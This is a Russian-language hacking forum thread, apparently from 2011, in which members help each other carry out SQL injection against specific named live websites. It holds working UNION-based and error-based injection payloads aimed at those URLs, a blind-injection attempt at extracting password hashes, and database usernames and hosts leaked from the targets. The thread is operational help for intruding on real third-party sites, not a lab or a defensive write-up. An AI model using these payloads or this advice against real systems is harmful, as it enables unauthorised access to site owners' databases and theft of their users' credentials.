Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    выдаеться ошибка скули, добился через blind
    но не могу немного в ней разобраться, вот она:
    Code:
    Database error: Invalid SQL: insert into logs (OBJECT_TYPE, OBJECT_ID, HTTP_USER_AGENT, BROWSER_NAME, BROWSER_VERSION, USER_PLATFORM, USER_OS, USER_IP, DATE, TIME,user_id, session_id) values ('topic',361 and (select 1 from mysql.user limit 0,1)=1,'Mozilla/5.0 (X11; Linux i686; rv:7.0a2) Gecko/20110728 Firefox/7.0a2 Iceweasel/7.0a2', 'Netscape','5.0', 'Unix','linux', '**.***.***.***', CURDATE(), CURTIME(),0,'4e84ef8d4c114f28b16dde2130be4638')
    MySQL Error: 1142 (SELECT command denied to user 'seesci_org@s3951'@'s109.loopia.se' for table 'user')
    Session halted.
    звездочками закрыл ip
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    ошибка тебе выдается потому что нет таблици user, покажи сам запрос который делаешь
     
    _________________________
  3. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    у тя там инсерт происходит, ты не можешь выводить. Это как общее, а у юзера закрыты права на селект.
     
    #17543 Melfis, 3 Aug 2011
    Last edited: 3 Aug 2011
  4. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    вот открывает страницу, по идее все норм
    Code:
    http://www.seesciencepolicy.org/sitegenius/topic.php?id=361 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    вот тебе вывод через ошибку:
    seesci_org@[email protected]:5.0.87-log:seesciencepolicy_org
     
    _________________________
  6. DronS

    DronS New Member

    Joined:
    14 Jul 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Направьте на путь истинный пожалуйста)
    На запрос:
    Code:
    http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
    нормально выдает имена всех таблиц.
    На запрос:
    Code:
    http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=CHAR(таблица)--
    корректно отдает имена столбцов.
    А на запрос:
    Code:
    http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat(столбец),4,5,6+from+таблица--
    шлет лесом вот такой фразой:
    Code:
    MySQL error:
    1146 : Table 'база.таблица' doesn't exist
    Как так не существует?? Ведь я же по второму запросу корректно получил столбцы из этой таблицы... И такая история по всем таблицам. Колонки получаю, а тяну данные, пишет, что таблицы нет.
    Как такое возможно?
     
  7. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Возможно нет доступа, нет таблицы, наложен чудодейственный фильтр или INFORMATION_SCHEMA вообще муляж.Попробуй обратиться к другим таблицам из INFORMATION_SCHEMA, и к таблицам к текущей базе данных.
     
    #17547 randman, 5 Aug 2011
    Last edited: 5 Aug 2011
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    вообще-то правильней сделать так:
    Code:
    http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( table_schema,0x3a,table_name),4,5,6+from+INFORMATION_SCHEMA.TABLES--
    дальше получаешь колонки, и обращаешься:
    Code:
    http://www.site.ru/news.php?id=9999999+union+select+1,2,group_concat( столбец),4,5,6+from+база.таблица--
    Всё дело в том, что ты пытаешься обратится к таблице которая скорее всего находится в другой базе, т.к. обращаться нужно напрямую "база.таблица"
     
    _________________________
    1 person likes this.
  9. oODungVTOo

    oODungVTOo New Member

    Joined:
    3 Jun 2011
    Messages:
    85
    Likes Received:
    1
    Reputations:
    0
    I see it have error but when i type:
    can anybody help me, pls! thank :)
     
  10. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    PHP:
    <?php 
    # php?id='60
    $a = (int)$_GET['id'];
    var_dump($a); // return: int(0)
    # php?id=60'
    $a = (int)$_GET['id'];
    var_dump($a); // return: int(60)
    ?>
     
    _________________________
    2 people like this.
  11. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    4.1.22:webmaster_infinite:infinite@localhost:redhat-linux-gnu
     
    1 person likes this.
  12. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    какие команды тут можно выполнить что бы получить доступ или хеши?

    Code:
    _http://www.mymicrocredit.org/mymicrocredit/index.php/forum/advsearch?q=hilfe&catids=5\%27
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как здесь добиться вывода БД?
     
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    http://school8.brestonline.com/index.php?act=gal&lng=ru&image='and(select(1)from(select(count(*)),concat((select(version())from(information_schema.tables)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)or'
     
    _________________________
    1 person likes this.
  15. nikon2k

    nikon2k Banned

    Joined:
    1 Aug 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    http://www.rulsmart.com/page/4209999999char%2827%29+union+select+1,2,3,2,3,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4

    что я делаю не так?
     
  16. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    тут нету скули.
    А ещё интересно, зачем ты вставляешь через чар.

    upd. Если ты таким макаром хотел вставить кавычку(но перепутал код символа), то нигде этим способом ничего не добьёшься.
     
    #17556 Melfis, 8 Aug 2011
    Last edited: 8 Aug 2011
  17. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Какой прогой можно сниффить программы автоматического проведения SQL Injection?!
     
  18. nikon2k

    nikon2k Banned

    Joined:
    1 Aug 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    кавычки ныкаю, извиняюсь

    http://gigwarez.ru/page/4209999999999999999999999/

    линк
     
  19. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    wpe, rpe

    и тут нету
     
    #17559 Melfis, 8 Aug 2011
    Last edited: 8 Aug 2011
    2 people like this.
  20. nikon2k

    nikon2k Banned

    Joined:
    1 Aug 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    хмм как нету? после второго значения лимита можно свой запрос добавить не?
     
Thread Status:
Not open for further replies.